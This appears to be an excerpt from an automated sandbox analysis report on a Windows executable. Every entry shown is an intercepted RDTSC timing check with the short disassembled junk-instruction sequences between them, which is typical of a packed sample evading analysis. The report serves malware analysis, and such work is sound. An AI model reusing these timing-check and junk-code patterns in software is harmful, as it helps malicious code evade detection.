Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1112BEF second address: 1112BF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1112BF3 second address: 1112BF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1112BF9 second address: 1112C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1112D31 second address: 1112D5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F1328EC0E11h 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1112D5D second address: 1112D7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F132877E3A6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d popad 0x0000000e jl 00007F132877E3BAh 0x00000014 push eax 0x00000015 push edx 0x00000016 jnp 00007F132877E3A6h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1112D7B second address: 1112D7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 111A14F second address: 111A159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 111A2DE second address: 111A2E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 111A2E3 second address: 111A2E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 111A2E9 second address: 111A306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1328EC0E09h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 111A306 second address: 111A30C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 111A836 second address: 111A840 instructions: 0x00000000 rdtsc 0x00000002 je 00007F1328EC0DF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 111ADA2 second address: 111ADAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 111ADAC second address: 111ADB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 popad 0x00000008 push ebx 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 111AEF4 second address: 111AF15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F132877E3B4h 0x00000009 popad 0x0000000a js 00007F132877E3ACh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1119CAC second address: 1119CC5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F1328EC0DFEh 0x0000000c pop edi 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1119CC5 second address: 1119CCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1119CCB second address: 1119CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F1328EC0DF6h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 111FD22 second address: 111FD46 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F132877E3A6h 0x00000008 jmp 00007F132877E3B5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1122B84 second address: 1122BAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F1328EC0DF6h 0x00000009 jnl 00007F1328EC0DF6h 0x0000000f jmp 00007F1328EC0DFBh 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push ebx 0x00000018 push esi 0x00000019 jc 00007F1328EC0DF6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 11251B5 second address: 11251CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edi 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007F132877E3ACh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 11251CB second address: 11251DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1328EC0DFCh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 11251DD second address: 11251E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 11251E5 second address: 11251F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F1328EC0DF6h 0x0000000a jno 00007F1328EC0DF6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 11251F7 second address: 1125201 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 11328F5 second address: 11328F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 11328F9 second address: 113291A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F132877E3BBh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1132421 second address: 113245F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1328EC0E06h 0x00000008 pushad 0x00000009 jmp 00007F1328EC0E06h 0x0000000e jmp 00007F1328EC0DFDh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 113245F second address: 1132470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jp 00007F132877E3B0h 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1133E79 second address: 1133E7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1137ECC second address: 1137ED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1137ED1 second address: 1137EDB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1328EC0DFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 113E559 second address: 113E577 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F132877E3B8h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1144FEA second address: 1144FF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1144FF0 second address: 114501C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F132877E3AFh 0x0000000a popad 0x0000000b pushad 0x0000000c jo 00007F132877E3AEh 0x00000012 jnc 00007F132877E3A6h 0x00000018 pushad 0x00000019 popad 0x0000001a jc 00007F132877E3ACh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 114DF61 second address: 114DF65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 114DF65 second address: 114DF71 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F132877E3A6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 114DF71 second address: 114DFA6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F1328EC0E08h 0x00000008 pop edx 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007F1328EC0E02h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 114E364 second address: 114E368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 114E368 second address: 114E375 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1328EC0DF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 114E487 second address: 114E490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 114E490 second address: 114E494 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 114E5DD second address: 114E5E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 114E779 second address: 114E77D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 114E77D second address: 114E783 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 114E783 second address: 114E78C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 114E78C second address: 114E792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 114E792 second address: 114E7A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1328EC0DFFh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 114E910 second address: 114E91B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F132877E3A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 114E91B second address: 114E948 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 js 00007F1328EC0DF6h 0x00000018 jmp 00007F1328EC0E02h 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1153FB4 second address: 1153FBA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1153FBA second address: 1153FC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F1328EC0E02h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1153FC8 second address: 1153FD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F132877E3A6h 0x0000000a popad 0x0000000b pushad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1163295 second address: 116329B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1170790 second address: 1170796 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1170796 second address: 11707BA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 je 00007F1328EC0DF6h 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F1328EC0E02h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 11707BA second address: 11707DC instructions: 0x00000000 rdtsc 0x00000002 jne 00007F132877E3A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F132877E3B8h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 11707DC second address: 11707E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 117477F second address: 117478B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F132877E3A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 117478B second address: 117478F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1174461 second address: 1174466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1174466 second address: 1174494 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 je 00007F1328EC0DF6h 0x00000009 ja 00007F1328EC0DF6h 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F1328EC0E03h 0x0000001a jl 00007F1328EC0DF6h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1176E07 second address: 1176E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jbe 00007F132877E3A6h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F132877E3B0h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1176E2B second address: 1176E35 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1328EC0DF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1176E35 second address: 1176E3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1176CB4 second address: 1176CC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 jl 00007F1328EC0E09h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 118F353 second address: 118F359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 118E4A2 second address: 118E4AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 118EA8B second address: 118EAA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F132877E3AEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 118EAA4 second address: 118EAA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 118ED72 second address: 118ED7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F132877E3A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 118ED7C second address: 118ED99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1328EC0E05h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 118ED99 second address: 118EDB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F132877E3ADh 0x0000000c push esi 0x0000000d pop esi 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1190901 second address: 1190924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 jmp 00007F1328EC0E08h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1190924 second address: 1190928 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 11946C3 second address: 11946C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 11946C7 second address: 11946E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F132877E3B7h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1194A50 second address: 1194A69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F1328EC0E00h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1194A69 second address: 1194A85 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F132877E3ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1194A85 second address: 1194AA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F1328EC0DF6h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [eax] 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 jmp 00007F1328EC0DFBh 0x00000018 pop edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 1196538 second address: 1196555 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F132877E3A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jmp 00007F132877E3AFh 0x00000010 push esi 0x00000011 pop esi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 11960A8 second address: 11960E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F1328EC0E08h 0x0000000a jmp 00007F1328EC0E06h 0x0000000f push esi 0x00000010 pop esi 0x00000011 jnl 00007F1328EC0DF6h 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 11980DF second address: 1198102 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F132877E3B9h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5020037 second address: 5020088 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1328EC0E09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F1328EC0DFCh 0x00000013 or si, F998h 0x00000018 jmp 00007F1328EC0DFBh 0x0000001d popfd 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 pushad 0x00000022 push edx 0x00000023 mov si, 1E9Dh 0x00000027 pop eax 0x00000028 popad 0x00000029 pop ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5020088 second address: 502008C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 502008C second address: 5020090 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 5020090 second address: 5020096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FE0F15 second address: 4FE0F30 instructions: 0x00000000 rdtsc 0x00000002 mov si, 6107h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F1328EC0DFAh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FE0F30 second address: 4FE0F34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FRCe39S0oE.exe RDTSC instruction interceptor: First address: 4FE0F34 second address: 4FE0F50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1328EC0E08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
